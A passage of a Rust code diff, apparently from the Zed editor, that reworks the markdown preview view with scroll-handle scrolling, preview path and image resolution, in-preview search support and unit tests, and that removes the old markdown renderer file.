self.list_state.scroll_by(scroll_height); + self.scroll_by_amount(scroll_height); + } else { + let scroll_height = self.line_scroll_amount(cx); + if !scroll_height.is_zero() { + self.scroll_by_amount(scroll_height); + } } cx.notify(); } @@ -486,9 +536,11 @@ impl MarkdownPreviewView { _window: &mut Window, cx: &mut Context, ) { - let scroll_top = self.list_state.logical_scroll_top(); - if let Some(bounds) = self.list_state.bounds_for_item(scroll_top.item_ix) { - self.list_state.scroll_by(-bounds.size.height); + if let Some(bounds) = self + .scroll_handle + .bounds_for_item(self.scroll_handle.top_item()) + { + self.scroll_by_amount(-bounds.size.height); } cx.notify(); } @@ -499,21 +551,213 @@ impl MarkdownPreviewView { _window: &mut Window, cx: &mut Context, ) { - let scroll_top = self.list_state.logical_scroll_top(); - if let Some(bounds) = self.list_state.bounds_for_item(scroll_top.item_ix) { - self.list_state.scroll_by(bounds.size.height); + if let Some(bounds) = self + .scroll_handle + .bounds_for_item(self.scroll_handle.top_item()) + { + self.scroll_by_amount(bounds.size.height); } cx.notify(); } + + fn scroll_to_top(&mut self, _: &ScrollToTop, _window: &mut Window, cx: &mut Context) { + self.scroll_handle.scroll_to_item(0); + cx.notify(); + } + + fn scroll_to_bottom( + &mut self, + _: &ScrollToBottom, + _window: &mut Window, + cx: &mut Context, + ) { + self.scroll_handle.scroll_to_bottom(); + cx.notify(); + } + + fn render_markdown_element( + &self, + window: &mut Window, + cx: &mut Context, + ) -> MarkdownElement { + let workspace = self.workspace.clone(); + let base_directory = self.base_directory.clone(); + let active_editor = self + .active_editor + .as_ref() + .map(|state| state.editor.clone()); + + let mut workspace_directory = None; + if let Some(workspace_entity) = self.workspace.upgrade() { + let project = workspace_entity.read(cx).project(); + if let Some(tree) = project.read(cx).worktrees(cx).next() { + workspace_directory = Some(tree.read(cx).abs_path().to_path_buf()); + } + } + + let mut markdown_element = MarkdownElement::new( + self.markdown.clone(), + MarkdownStyle::themed(MarkdownFont::Editor, window, cx), + ) + .code_block_renderer(CodeBlockRenderer::Default { + copy_button_visibility: CopyButtonVisibility::VisibleOnHover, + border: false, + }) + .scroll_handle(self.scroll_handle.clone()) + .show_root_block_markers() + .image_resolver({ + let base_directory = self.base_directory.clone(); + move |dest_url| { + resolve_preview_image( + dest_url, + base_directory.as_deref(), + workspace_directory.as_deref(), + ) + } + }) + .on_url_click(move |url, window, cx| { + open_preview_url(url, base_directory.clone(), &workspace, window, cx); + }); + + if let Some(active_editor) = active_editor { + let editor_for_checkbox = active_editor.clone(); + let view_handle = cx.entity().downgrade(); + markdown_element = markdown_element + .on_source_click(move |source_index, click_count, window, cx| { + if click_count == 2 { + Self::move_cursor_to_source_index(&active_editor, source_index, window, cx); + true + } else { + false + } + }) + .on_checkbox_toggle(move |source_range, new_checked, window, cx| { + let task_marker = if new_checked { "[x]" } else { "[ ]" }; + editor_for_checkbox.update(cx, |editor, cx| { + editor.edit( + [( + MultiBufferOffset(source_range.start) + ..MultiBufferOffset(source_range.end), + task_marker, + )], + cx, + ); + }); + if let Some(view) = view_handle.upgrade() { + cx.update_entity(&view, |this, cx| { + this.update_markdown_from_active_editor(false, false, window, cx); + }); + } + }); + } + + markdown_element + } +} + +fn open_preview_url( + url: SharedString, + base_directory: Option, + workspace: &WeakEntity, + window: &mut Window, + cx: &mut App, +) { + if let Some(path) = resolve_preview_path(url.as_ref(), base_directory.as_deref()) + && let Some(workspace) = workspace.upgrade() + { + let _ = workspace.update(cx, |workspace, cx| { + workspace + .open_abs_path( + normalize_path(path.as_path()), + OpenOptions { + visible: Some(OpenVisible::None), + ..Default::default() + }, + window, + cx, + ) + .detach(); + }); + return; + } + + cx.open_url(url.as_ref()); +} + +fn resolve_preview_path(url: &str, base_directory: Option<&Path>) -> Option { + if url.starts_with("http://") || url.starts_with("https://") { + return None; + } + + let decoded_url = urlencoding::decode(url) + .map(|decoded| decoded.into_owned()) + .unwrap_or_else(|_| url.to_string()); + let candidate = PathBuf::from(&decoded_url); + + if candidate.is_absolute() && candidate.exists() { + return Some(candidate); + } + + let base_directory = base_directory?; + let resolved = base_directory.join(decoded_url); + if resolved.exists() { + Some(resolved) + } else { + None + } +} + +fn resolve_preview_image( + dest_url: &str, + base_directory: Option<&Path>, + workspace_directory: Option<&Path>, +) -> Option { + if dest_url.starts_with("data:") { + return None; + } + + if dest_url.starts_with("http://") || dest_url.starts_with("https://") { + return Some(ImageSource::Resource(Resource::Uri(SharedUri::from( + dest_url.to_string(), + )))); + } + + let decoded = urlencoding::decode(dest_url) + .map(|decoded| decoded.into_owned()) + .unwrap_or_else(|_| dest_url.to_string()); + + let decoded_path = Path::new(&decoded); + + if let Ok(relative_path) = decoded_path.strip_prefix("/") { + if let Some(root) = workspace_directory { + let absolute_path = root.join(relative_path); + if absolute_path.exists() { + return Some(ImageSource::Resource(Resource::Path(Arc::from( + absolute_path.as_path(), + )))); + } + } + } + + let path = if Path::new(&decoded).is_absolute() { + PathBuf::from(decoded) + } else { + base_directory?.join(decoded) + }; + + Some(ImageSource::Resource(Resource::Path(Arc::from( + path.as_path(), + )))) } impl Focusable for MarkdownPreviewView { - fn focus_handle(&self, _: &App) -> gpui::FocusHandle { + fn focus_handle(&self, _: &App) -> FocusHandle { self.focus_handle.clone() } } impl EventEmitter<()> for MarkdownPreviewView {} +impl EventEmitter for MarkdownPreviewView {} impl Item for MarkdownPreviewView { type Event = (); @@ -538,14 +782,23 @@ impl Item for MarkdownPreviewView { } fn to_item_events(_event: &Self::Event, _f: &mut dyn FnMut(workspace::item::ItemEvent)) {} + + fn buffer_kind(&self, _cx: &App) -> ItemBufferKind { + ItemBufferKind::Singleton + } + + fn as_searchable( + &self, + handle: &Entity, + _: &App, + ) -> Option> { + Some(Box::new(handle.clone())) + } } impl Render for MarkdownPreviewView { fn render(&mut self, window: &mut Window, cx: &mut Context) -> impl IntoElement { - let buffer_size = ThemeSettings::get_global(cx).buffer_font_size(cx); - let buffer_line_height = ThemeSettings::get_global(cx).buffer_line_height; - - v_flex() + div() .image_cache(self.image_cache.clone()) .id("MarkdownPreview") .key_context("MarkdownPreview") @@ -556,115 +809,254 @@ impl Render for MarkdownPreviewView { .on_action(cx.listener(MarkdownPreviewView::scroll_down)) .on_action(cx.listener(MarkdownPreviewView::scroll_up_by_item)) .on_action(cx.listener(MarkdownPreviewView::scroll_down_by_item)) + .on_action(cx.listener(MarkdownPreviewView::scroll_to_top)) + .on_action(cx.listener(MarkdownPreviewView::scroll_to_bottom)) .size_full() .bg(cx.theme().colors().editor_background) - .p_4() - .text_size(buffer_size) - .line_height(relative(buffer_line_height.value())) - .child(div().flex_grow().map(|this| { - this.child( - list( - self.list_state.clone(), - cx.processor(|this, ix, window, cx| { - let Some(contents) = &this.contents else { - return div().into_any(); - }; - - let mut render_cx = RenderContext::new( - Some(this.workspace.clone()), - &this.mermaid_state, - window, - cx, - ) - .with_checkbox_clicked_callback(cx.listener( - move |this, e: &CheckboxClickedEvent, window, cx| { - if let Some(editor) = - this.active_editor.as_ref().map(|s| s.editor.clone()) - { - editor.update(cx, |editor, cx| { - let task_marker = - if e.checked() { "[x]" } else { "[ ]" }; - - editor.edit( - [( - MultiBufferOffset(e.source_range().start) - ..MultiBufferOffset(e.source_range().end), - task_marker, - )], - cx, - ); - }); - this.parse_markdown_from_active_editor(false, window, cx); - cx.notify(); - } - }, - )); - - let block = contents.children.get(ix).unwrap(); - let rendered_block = render_markdown_block(block, &mut render_cx); - - let should_apply_padding = Self::should_apply_padding_between( - block, - contents.children.get(ix + 1), - ); - - let selected_block = this.selected_block; - let scaled_rems = render_cx.scaled_rems(1.0); - div() - .id(ix) - .when(should_apply_padding, |this| { - this.pb(render_cx.scaled_rems(0.75)) - }) - .group("markdown-block") - .on_click(cx.listener( - move |this, event: &ClickEvent, window, cx| { - if event.click_count() == 2 - && let Some(source_range) = this - .contents - .as_ref() - .and_then(|c| c.children.get(ix)) - .and_then(|block: &ParsedMarkdownElement| { - block.source_range() - }) - { - this.move_cursor_to_block( - window, - cx, - MultiBufferOffset(source_range.start) - ..MultiBufferOffset(source_range.start), - ); - } - }, - )) - .map(move |container| { - let indicator = div() - .h_full() - .w(px(4.0)) - .when(ix == selected_block, |this| { - this.bg(cx.theme().colors().border) - }) - .group_hover("markdown-block", |s| { - if ix == selected_block { - s - } else { - s.bg(cx.theme().colors().border_variant) - } - }) - .rounded_xs(); - - container.child( - div() - .relative() - .child(div().pl(scaled_rems).child(rendered_block)) - .child(indicator.absolute().left_0().top_0()), - ) - }) - .into_any() - }), - ) - .size_full(), - ) - })) - .vertical_scrollbar_for(&self.list_state, window, cx) + .child( + div() + .id("markdown-preview-scroll-container") + .size_full() + .overflow_y_scroll() + .track_scroll(&self.scroll_handle) + .p_4() + .child(self.render_markdown_element(window, cx)), + ) + .vertical_scrollbar_for(&self.scroll_handle, window, cx) + } +} + +impl SearchableItem for MarkdownPreviewView { + type Match = Range; + + fn supported_options(&self) -> SearchOptions { + SearchOptions { + case: true, + word: true, + regex: true, + replacement: false, + selection: false, + select_all: false, + find_in_results: false, + } + } + + fn get_matches(&self, _window: &mut Window, cx: &mut App) -> (Vec, SearchToken) { + ( + self.markdown.read(cx).search_highlights().to_vec(), + SearchToken::default(), + ) + } + + fn clear_matches(&mut self, _window: &mut Window, cx: &mut Context) { + let had_highlights = !self.markdown.read(cx).search_highlights().is_empty(); + self.markdown.update(cx, |markdown, cx| { + markdown.clear_search_highlights(cx); + }); + if had_highlights { + cx.emit(SearchEvent::MatchesInvalidated); + } + } + + fn update_matches( + &mut self, + matches: &[Self::Match], + active_match_index: Option, + _token: SearchToken, + _window: &mut Window, + cx: &mut Context, + ) { + let old_highlights = self.markdown.read(cx).search_highlights(); + let changed = old_highlights != matches; + self.markdown.update(cx, |markdown, cx| { + markdown.set_search_highlights(matches.to_vec(), active_match_index, cx); + }); + if changed { + cx.emit(SearchEvent::MatchesInvalidated); + } + } + + fn query_suggestion(&mut self, _window: &mut Window, cx: &mut Context) -> String { + self.markdown.read(cx).selected_text().unwrap_or_default() + } + + fn activate_match( + &mut self, + index: usize, + matches: &[Self::Match], + _token: SearchToken, + _window: &mut Window, + cx: &mut Context, + ) { + if let Some(match_range) = matches.get(index) { + let start = match_range.start; + self.markdown.update(cx, |markdown, cx| { + markdown.set_active_search_highlight(Some(index), cx); + markdown.request_autoscroll_to_source_index(start, cx); + }); + cx.emit(SearchEvent::ActiveMatchChanged); + } + } + + fn select_matches( + &mut self, + _matches: &[Self::Match], + _token: SearchToken, + _window: &mut Window, + _cx: &mut Context, + ) { + } + + fn replace( + &mut self, + _: &Self::Match, + _: &SearchQuery, + _token: SearchToken, + _window: &mut Window, + _: &mut Context, + ) { + } + + fn find_matches( + &mut self, + query: Arc, + _window: &mut Window, + cx: &mut Context, + ) -> Task> { + let source = self.markdown.read(cx).source().to_string(); + cx.background_spawn(async move { query.search_str(&source) }) + } + + fn active_match_index( + &mut self, + direction: Direction, + matches: &[Self::Match], + _token: SearchToken, + _window: &mut Window, + cx: &mut Context, + ) -> Option { + if matches.is_empty() { + return None; + } + + let markdown = self.markdown.read(cx); + let current_source_index = markdown + .active_search_highlight() + .and_then(|i| markdown.search_highlights().get(i)) + .map(|m| m.start) + .or(self.active_source_index) + .unwrap_or(0); + + match direction { + Direction::Next => matches + .iter() + .position(|m| m.start >= current_source_index) + .or(Some(0)), + Direction::Prev => matches + .iter() + .rposition(|m| m.start <= current_source_index) + .or(Some(matches.len().saturating_sub(1))), + } + } +} + +#[cfg(test)] +mod tests { + use crate::markdown_preview_view::ImageSource; + use crate::markdown_preview_view::Resource; + use crate::markdown_preview_view::resolve_preview_image; + use anyhow::Result; + use std::fs; + use tempfile::TempDir; + + use super::resolve_preview_path; + + #[test] + fn resolves_relative_preview_paths() -> Result<()> { + let temp_dir = TempDir::new()?; + let base_directory = temp_dir.path(); + let file = base_directory.join("notes.md"); + fs::write(&file, "# Notes")?; + + assert_eq!( + resolve_preview_path("notes.md", Some(base_directory)), + Some(file) + ); + assert_eq!( + resolve_preview_path("nonexistent.md", Some(base_directory)), + None + ); + assert_eq!(resolve_preview_path("notes.md", None), None); + + Ok(()) + } + + #[test] + fn resolves_urlencoded_preview_paths() -> Result<()> { + let temp_dir = TempDir::new()?; + let base_directory = temp_dir.path(); + let file = base_directory.join("release notes.md"); + fs::write(&file, "# Release Notes")?; + + assert_eq!( + resolve_preview_path("release%20notes.md", Some(base_directory)), + Some(file) + ); + + Ok(()) + } + + #[test] + fn resolves_workspace_absolute_preview_images() -> Result<()> { + let temp_dir = TempDir::new()?; + let workspace_directory = temp_dir.path(); + + let base_directory = workspace_directory.join("docs"); + fs::create_dir_all(&base_directory)?; + + let image_file = workspace_directory.join("test_image.png"); + fs::write(&image_file, "mock data")?; + + let resolved_success = resolve_preview_image( + "/test_image.png", + Some(&base_directory), + Some(workspace_directory), + ); + + match resolved_success { + Some(ImageSource::Resource(Resource::Path(p))) => { + assert_eq!(p.as_ref(), image_file.as_path()); + } + _ => panic!("Expected successful resolution to be a Resource::Path"), + } + + let resolved_missing = resolve_preview_image( + "/missing_image.png", + Some(&base_directory), + Some(workspace_directory), + ); + + let expected_missing_path = if std::path::Path::new("/missing_image.png").is_absolute() { + std::path::PathBuf::from("/missing_image.png") + } else { + // join is to retain windows path prefix C:/ + #[expect(clippy::join_absolute_paths)] + base_directory.join("/missing_image.png") + }; + + match resolved_missing { + Some(ImageSource::Resource(Resource::Path(p))) => { + assert_eq!(p.as_ref(), expected_missing_path.as_path()); + } + _ => panic!("Expected missing file to fallback to a Resource::Path"), + } + + Ok(()) + } + + #[test] + fn does_not_treat_web_links_as_preview_paths() { + assert_eq!(resolve_preview_path("https://zed.dev", None), None); + assert_eq!(resolve_preview_path("http://example.com", None), None); } } diff --git a/crates/markdown_preview/src/markdown_renderer.rs b/crates/markdown_preview/src/markdown_renderer.rs deleted file mode 100644 index 67131a6b2cb81f82a2c550944c96fb4e1ed5a93a..0000000000000000000000000000000000000000 --- a/crates/markdown_preview/src/markdown_renderer.rs +++ /dev/null @@ -1,1500 +0,0 @@ -use crate::{ - markdown_elements::{ - HeadingLevel, Image, Link, MarkdownParagraph, MarkdownParagraphChunk, ParsedMarkdown, - ParsedMarkdownBlockQuote, ParsedMarkdownCodeBlock, ParsedMarkdownElement, - ParsedMarkdownHeading, ParsedMarkdownListItem, ParsedMarkdownListItemType, - ParsedMarkdownMermaidDiagram, ParsedMarkdownMermaidDiagramContents, ParsedMarkdownTable, - ParsedMarkdownTableAlignment, ParsedMarkdownTableRow, - }, - markdown_preview_view::MarkdownPreviewView, -}; -use collections::HashMap; -use fs::normalize_path; -use gpui::{ - AbsoluteLength, Animation, AnimationExt, AnyElement, App, AppContext as _, Context, Div, - Element, ElementId, Entity, HighlightStyle, Hsla, ImageSource, InteractiveText, IntoElement, - Keystroke, Modifiers, ParentElement, Render, RenderImage, Resource, SharedString, Styled, - StyledText, Task, TextStyle, WeakEntity, Window, div, img, pulsating_between, rems, -}; -use settings::Settings; -use std::{ - ops::{Mul, Range}, - sync::{Arc, OnceLock}, - time::Duration, - vec, -}; -use theme::{ActiveTheme, SyntaxTheme, ThemeSettings}; -use ui::{CopyButton, LinkPreview, ToggleState, prelude::*, tooltip_container}; -use workspace::{OpenOptions, OpenVisible, Workspace}; - -pub struct CheckboxClickedEvent { - pub checked: bool, - pub source_range: Range, -} - -impl CheckboxClickedEvent { - pub fn source_range(&self) -> Range { - self.source_range.clone() - } - - pub fn checked(&self) -> bool { - self.checked - } -} - -type CheckboxClickedCallback = Arc>; - -type MermaidDiagramCache = HashMap; - -#[derive(Default)] -pub(crate) struct MermaidState { - cache: MermaidDiagramCache, - order: Vec, -} - -impl MermaidState { - fn get_fallback_image( - idx: usize, - old_order: &[ParsedMarkdownMermaidDiagramContents], - new_order_len: usize, - cache: &MermaidDiagramCache, - ) -> Option> { - // When the diagram count changes e.g. addition or removal, positional matching - // is unreliable since a new diagram at index i likely doesn't correspond to the - // old diagram at index i. We only allow fallbacks when counts match, which covers - // the common case of editing a diagram in-place. - // - // Swapping two diagrams would briefly show the stale fallback, but that's an edge - // case we don't handle. - if old_order.len() != new_order_len { - return None; - } - old_order.get(idx).and_then(|old_content| { - cache.get(old_content).and_then(|old_cached| { - old_cached - .render_image - .get() - .and_then(|result| result.as_ref().ok().cloned()) - // Chain fallbacks for rapid edits. - .or_else(|| old_cached.fallback_image.clone()) - }) - }) - } - - pub(crate) fn update( - &mut self, - parsed: &ParsedMarkdown, - cx: &mut Context, - ) { - use crate::markdown_elements::ParsedMarkdownElement; - use std::collections::HashSet; - - let mut new_order = Vec::new(); - for element in parsed.children.iter() { - if let ParsedMarkdownElement::MermaidDiagram(mermaid_diagram) = element { - new_order.push(mermaid_diagram.contents.clone()); - } - } - - for (idx, new_content) in new_order.iter().enumerate() { - if !self.cache.contains_key(new_content) { - let fallback = - Self::get_fallback_image(idx, &self.order, new_order.len(), &self.cache); - self.cache.insert( - new_content.clone(), - CachedMermaidDiagram::new(new_content.clone(), fallback, cx), - ); - } - } - - let new_order_set: HashSet<_> = new_order.iter().cloned().collect(); - self.cache - .retain(|content, _| new_order_set.contains(content)); - self.order = new_order; - } -} - -pub(crate) struct CachedMermaidDiagram { - pub(crate) render_image: Arc>>>, - pub(crate) fallback_image: Option>, - _task: Task<()>, -} - -impl CachedMermaidDiagram { - pub(crate) fn new( - contents: ParsedMarkdownMermaidDiagramContents, - fallback_image: Option>, - cx: &mut Context, - ) -> Self { - let result = Arc::new(OnceLock::>>::new()); - let result_clone = result.clone(); - let svg_renderer = cx.svg_renderer(); - - let _task = cx.spawn(async move |this, cx| { - let value = cx - .background_spawn(async move { - let svg_string = crashes::recoverable_panic(|| { - mermaid_rs_renderer::render(&contents.contents) - })??; - let scale = contents.scale as f32 / 100.0; - svg_renderer - .render_single_frame(svg_string.as_bytes(), scale, true) - .map_err(|e| anyhow::anyhow!("{}", e)) - }) - .await; - let _ = result_clone.set(value); - this.update(cx, |_, cx| { - cx.notify(); - }) - .ok(); - }); - - Self { - render_image: result, - fallback_image, - _task, - } - } - - #[cfg(test)] - fn new_for_test( - render_image: Option>, - fallback_image: Option>, - ) -> Self { - let result = Arc::new(OnceLock::new()); - if let Some(img) = render_image { - let _ = result.set(Ok(img)); - } - Self { - render_image: result, - fallback_image, - _task: Task::ready(()), - } - } -} -#[derive(Clone)] -pub struct RenderContext<'a> { - workspace: Option>, - next_id: usize, - buffer_font_family: SharedString, - buffer_text_style: TextStyle, - text_style: TextStyle, - border_color: Hsla, - title_bar_background_color: Hsla, - panel_background_color: Hsla, - text_color: Hsla, - link_color: Hsla, - window_rem_size: Pixels, - text_muted_color: Hsla, - code_block_background_color: Hsla, - code_span_background_color: Hsla, - syntax_theme: Arc, - indent: usize, - checkbox_clicked_callback: Option, - is_last_child: bool, - mermaid_state: &'a MermaidState, -} - -impl<'a> RenderContext<'a> { - pub(crate) fn new( - workspace: Option>, - mermaid_state: &'a MermaidState, - window: &mut Window, - cx: &mut App, - ) -> Self { - let theme = cx.theme().clone(); - - let settings = ThemeSettings::get_global(cx); - let buffer_font_family = settings.buffer_font.family.clone(); - let buffer_font_features = settings.buffer_font.features.clone(); - let mut buffer_text_style = window.text_style(); - buffer_text_style.font_family = buffer_font_family.clone(); - buffer_text_style.font_features = buffer_font_features; - buffer_text_style.font_size = AbsoluteLength::from(settings.buffer_font_size(cx)); - - RenderContext { - workspace, - next_id: 0, - indent: 0, - buffer_font_family, - buffer_text_style, - text_style: window.text_style(), - syntax_theme: theme.syntax().clone(), - border_color: theme.colors().border, - title_bar_background_color: theme.colors().title_bar_background, - panel_background_color: theme.colors().panel_background, - text_color: theme.colors().text, - link_color: theme.colors().text_accent, - window_rem_size: window.rem_size(), - text_muted_color: theme.colors().text_muted, - code_block_background_color: theme.colors().surface_background, - code_span_background_color: theme.colors().editor_document_highlight_read_background, - checkbox_clicked_callback: None, - is_last_child: false, - mermaid_state, - } - } - - pub fn with_checkbox_clicked_callback( - mut self, - callback: impl Fn(&CheckboxClickedEvent, &mut Window, &mut App) + 'static, - ) -> Self { - self.checkbox_clicked_callback = Some(Arc::new(Box::new(callback))); - self - } - - fn next_id(&mut self, span: &Range) -> ElementId { - let id = format!("markdown-{}-{}-{}", self.next_id, span.start, span.end); - self.next_id += 1; - ElementId::from(SharedString::from(id)) - } - - /// HACK: used to have rems relative to buffer font size, so that things scale appropriately as - /// buffer font size changes. The callees of this function should be reimplemented to use real - /// relative sizing once that is implemented in GPUI - pub fn scaled_rems(&self, rems: f32) -> Rems { - self.buffer_text_style - .font_size - .to_rems(self.window_rem_size) - .mul(rems) - } - - /// This ensures that children inside of block quotes - /// have padding between them. - /// - /// For example, for this markdown: - /// - /// ```markdown - /// > This is a block quote. - /// > - /// > And this is the next paragraph. - /// ``` - /// - /// We give padding between "This is a block quote." - /// and "And this is the next paragraph." - fn with_common_p(&self, element: Div) -> Div { - if self.indent > 0 && !self.is_last_child { - element.pb(self.scaled_rems(0.75)) - } else { - element - } - } - - /// The is used to indicate that the current element is the last child or not of its parent. - /// - /// Then we can avoid adding padding to the bottom of the last child. - fn with_last_child(&mut self, is_last: bool, render: R) -> AnyElement - where - R: FnOnce(&mut Self) -> AnyElement, - { - self.is_last_child = is_last; - let element = render(self); - self.is_last_child = false; - element - } -} - -pub fn render_parsed_markdown( - parsed: &ParsedMarkdown, - workspace: Option>, - window: &mut Window, - cx: &mut App, -) -> Div { - let cache = Default::default(); - let mut cx = RenderContext::new(workspace, &cache, window, cx); - - v_flex().gap_3().children( - parsed - .children - .iter() - .map(|block| render_markdown_block(block, &mut cx)), - ) -} -pub fn render_markdown_block(block: &ParsedMarkdownElement, cx: &mut RenderContext) -> AnyElement { - use ParsedMarkdownElement::*; - match block { - Paragraph(text) => render_markdown_paragraph(text, cx), - Heading(heading) => render_markdown_heading(heading, cx), - ListItem(list_item) => render_markdown_list_item(list_item, cx), - Table(table) => render_markdown_table(table, cx), - BlockQuote(block_quote) => render_markdown_block_quote(block_quote, cx), - CodeBlock(code_block) => render_markdown_code_block(code_block, cx), - MermaidDiagram(mermaid) => render_mermaid_diagram(mermaid, cx), - HorizontalRule(_) => render_markdown_rule(cx), - Image(image) => render_markdown_image(image, cx), - } -} - -fn render_markdown_heading(parsed: &ParsedMarkdownHeading, cx: &mut RenderContext) -> AnyElement { - let size = match parsed.level { - HeadingLevel::H1 => 2., - HeadingLevel::H2 => 1.5, - HeadingLevel::H3 => 1.25, - HeadingLevel::H4 => 1., - HeadingLevel::H5 => 0.875, - HeadingLevel::H6 => 0.85, - }; - - let text_size = cx.scaled_rems(size); - - // was `DefiniteLength::from(text_size.mul(1.25))` - // let line_height = DefiniteLength::from(text_size.mul(1.25)); - let line_height = text_size * 1.25; - - // was `rems(0.15)` - // let padding_top = cx.scaled_rems(0.15); - let padding_top = rems(0.15); - - // was `.pb_1()` = `rems(0.25)` - // let padding_bottom = cx.scaled_rems(0.25); - let padding_bottom = rems(0.25); - - let color = match parsed.level { - HeadingLevel::H6 => cx.text_muted_color, - _ => cx.text_color, - }; - div() - .line_height(line_height) - .text_size(text_size) - .text_color(color) - .pt(padding_top) - .pb(padding_bottom) - .children(render_markdown_text(&parsed.contents, cx)) - .whitespace_normal() - .into_any() -} - -fn render_markdown_list_item( - parsed: &ParsedMarkdownListItem, - cx: &mut RenderContext, -) -> AnyElement { - use ParsedMarkdownListItemType::*; - let depth = parsed.depth.saturating_sub(1) as usize; - - let bullet = match &parsed.item_type { - Ordered(order) => list_item_prefix(*order as usize, true, depth).into_any_element(), - Unordered => list_item_prefix(1, false, depth).into_any_element(), - Task(checked, range) => div() - .id(cx.next_id(range)) - .mt(cx.scaled_rems(3.0 / 16.0)) - .child( - MarkdownCheckbox::new( - "checkbox", - if *checked { - ToggleState::Selected - } else { - ToggleState::Unselected - }, - cx.clone(), - ) - .when_some( - cx.checkbox_clicked_callback.clone(), - |this, callback| { - this.on_click({ - let range = range.clone(); - move |selection, window, cx| { - let checked = match selection { - ToggleState::Selected => true, - ToggleState::Unselected => false, - _ => return, - }; - - if window.modifiers().secondary() { - callback( - &CheckboxClickedEvent { - checked, - source_range: range.clone(), - }, - window, - cx, - ); - } - } - }) - }, - ), - ) - .hover(|s| s.cursor_pointer()) - .tooltip(|_, cx| { - InteractiveMarkdownElementTooltip::new(None, "toggle checkbox", cx).into() - }) - .into_any_element(), - }; - let bullet = div().mr(cx.scaled_rems(0.5)).child(bullet); - - let contents: Vec = parsed - .content - .iter() - .map(|c| render_markdown_block(c, cx)) - .collect(); - - let item = h_flex() - .when(!parsed.nested, |this| this.pl(cx.scaled_rems(depth as f32))) - .when(parsed.nested && depth > 0, |this| this.ml_neg_1p5()) - .items_start() - .children(vec![ - bullet, - v_flex() - .children(contents) - .when(!parsed.nested, |this| this.gap(cx.scaled_rems(1.0))) - .pr(cx.scaled_rems(1.0)) - .w_full(), - ]); - - cx.with_common_p(item).into_any() -} - -/// # MarkdownCheckbox /// -/// HACK: Copied from `ui/src/components/toggle.rs` to deal with scaling issues in markdown preview -/// changes should be integrated into `Checkbox` in `toggle.rs` while making sure checkboxes elsewhere in the -/// app are not visually affected -#[derive(gpui::IntoElement)] -struct MarkdownCheckbox { - id: ElementId, - toggle_state: ToggleState, - disabled: bool, - placeholder: bool, - on_click: Option>, - filled: bool, - style: ui::ToggleStyle, - tooltip: Option gpui::AnyView>>, - label: Option, - base_rem: Rems, -} - -impl MarkdownCheckbox { - /// Creates a new [`Checkbox`]. - fn new(id: impl Into, checked: ToggleState, render_cx: RenderContext) -> Self { - Self { - id: id.into(), - toggle_state: checked, - disabled: false, - on_click: None, - filled: false, - style: ui::ToggleStyle::default(), - tooltip: None, - label: None, - placeholder: false, - base_rem: render_cx.scaled_rems(1.0), - } - } - - /// Binds a handler to the [`Checkbox`] that will be called when clicked. - fn on_click(mut self, handler: impl Fn(&ToggleState, &mut Window, &mut App) + 'static) -> Self { - self.on_click = Some(Box::new(handler)); - self - } - - fn bg_color(&self, cx: &App) -> Hsla { - let style = self.style.clone(); - match (style, self.filled) { - (ui::ToggleStyle::Ghost, false) => cx.theme().colors().ghost_element_background, - (ui::ToggleStyle::Ghost, true) => cx.theme().colors().element_background, - (ui::ToggleStyle::ElevationBased(_), false) => gpui::transparent_black(), - (ui::ToggleStyle::ElevationBased(elevation), true) => elevation.darker_bg(cx), - (ui::ToggleStyle::Custom(_), false) => gpui::transparent_black(), - (ui::ToggleStyle::Custom(color), true) => color.opacity(0.2), - } - } - - fn border_color(&self, cx: &App) -> Hsla { - if self.disabled { - return cx.theme().colors().border_variant; - } - - match self.style.clone() { - ui::ToggleStyle::Ghost => cx.theme().colors().border, - ui::ToggleStyle::ElevationBased(_) => cx.theme().colors().border, - ui::ToggleStyle::Custom(color) => color.opacity(0.3), - } - } -} - -impl gpui::RenderOnce for MarkdownCheckbox { - fn render(self, _: &mut Window, cx: &mut App) -> impl IntoElement { - let group_id = format!("checkbox_group_{:?}", self.id); - let color = if self.disabled { - Color::Disabled - } else { - Color::Selected - }; - let icon_size_small = IconSize::Custom(self.base_rem.mul(14. / 16.)); // was IconSize::Small - let icon = match self.toggle_state { - ToggleState::Selected => { - if self.placeholder { - None - } else { - Some( - ui::Icon::new(IconName::Check) - .size(icon_size_small) - .color(color), - ) - } - } - ToggleState::Indeterminate => Some( - ui::Icon::new(IconName::Dash) - .size(icon_size_small) - .color(color), - ), - ToggleState::Unselected => None, - }; - - let bg_color = self.bg_color(cx); - let border_color = self.border_color(cx); - let hover_border_color = border_color.alpha(0.7); - - let size = self.base_rem.mul(1.25); // was Self::container_size(); (20px) - - let checkbox = h_flex() - .id(self.id.clone()) - .justify_center() - .items_center() - .size(size) - .group(group_id.clone()) - .child( - div() - .flex() - .flex_none() - .justify_center() - .items_center() - .m(self.base_rem.mul(0.25)) // was .m_1 - .size(self.base_rem.mul(1.0)) // was .size_4 - .rounded(self.base_rem.mul(0.125)) // was .rounded_xs - .border_1() - .bg(bg_color) - .border_color(border_color) - .when(self.disabled, |this| this.cursor_not_allowed()) - .when(self.disabled, |this| { - this.bg(cx.theme().colors().element_disabled.opacity(0.6)) - }) - .when(!self.disabled, |this| { - this.group_hover(group_id.clone(), |el| el.border_color(hover_border_color)) - }) - .when(self.placeholder, |this| { - this.child( - div() - .flex_none() - .rounded_full() - .bg(color.color(cx).alpha(0.5)) - .size(self.base_rem.mul(0.25)), // was .size_1 - ) - }) - .children(icon), - ); - - h_flex() - .id(self.id) - .gap(ui::DynamicSpacing::Base06.rems(cx)) - .child(checkbox) - .when_some( - self.on_click.filter(|_| !self.disabled), - |this, on_click| { - this.on_click(move |_, window, cx| { - on_click(&self.toggle_state.inverse(), window, cx) - }) - }, - ) - // TODO: Allow label size to be different from default. - // TODO: Allow label color to be different from muted. - .when_some(self.label, |this, label| { - this.child(Label::new(label).color(Color::Muted)) - }) - .when_some(self.tooltip, |this, tooltip| { - this.tooltip(move |window, cx| tooltip(window, cx)) - }) - } -} - -fn calculate_table_columns_count(rows: &Vec) -> usize { - let mut actual_column_count = 0; - for row in rows { - actual_column_count = actual_column_count.max( - row.columns - .iter() - .map(|column| column.col_span) - .sum::(), - ); - } - actual_column_count -} - -fn render_markdown_table(parsed: &ParsedMarkdownTable, cx: &mut RenderContext) -> AnyElement { - let actual_header_column_count = calculate_table_columns_count(&parsed.header); - let actual_body_column_count = calculate_table_columns_count(&parsed.body); - let max_column_count = std::cmp::max(actual_header_column_count, actual_body_column_count); - - let total_rows = parsed.header.len() + parsed.body.len(); - - // Track which grid cells are occupied by spanning cells - let mut grid_occupied = vec![vec![false; max_column_count]; total_rows]; - - let mut cells = Vec::with_capacity(total_rows * 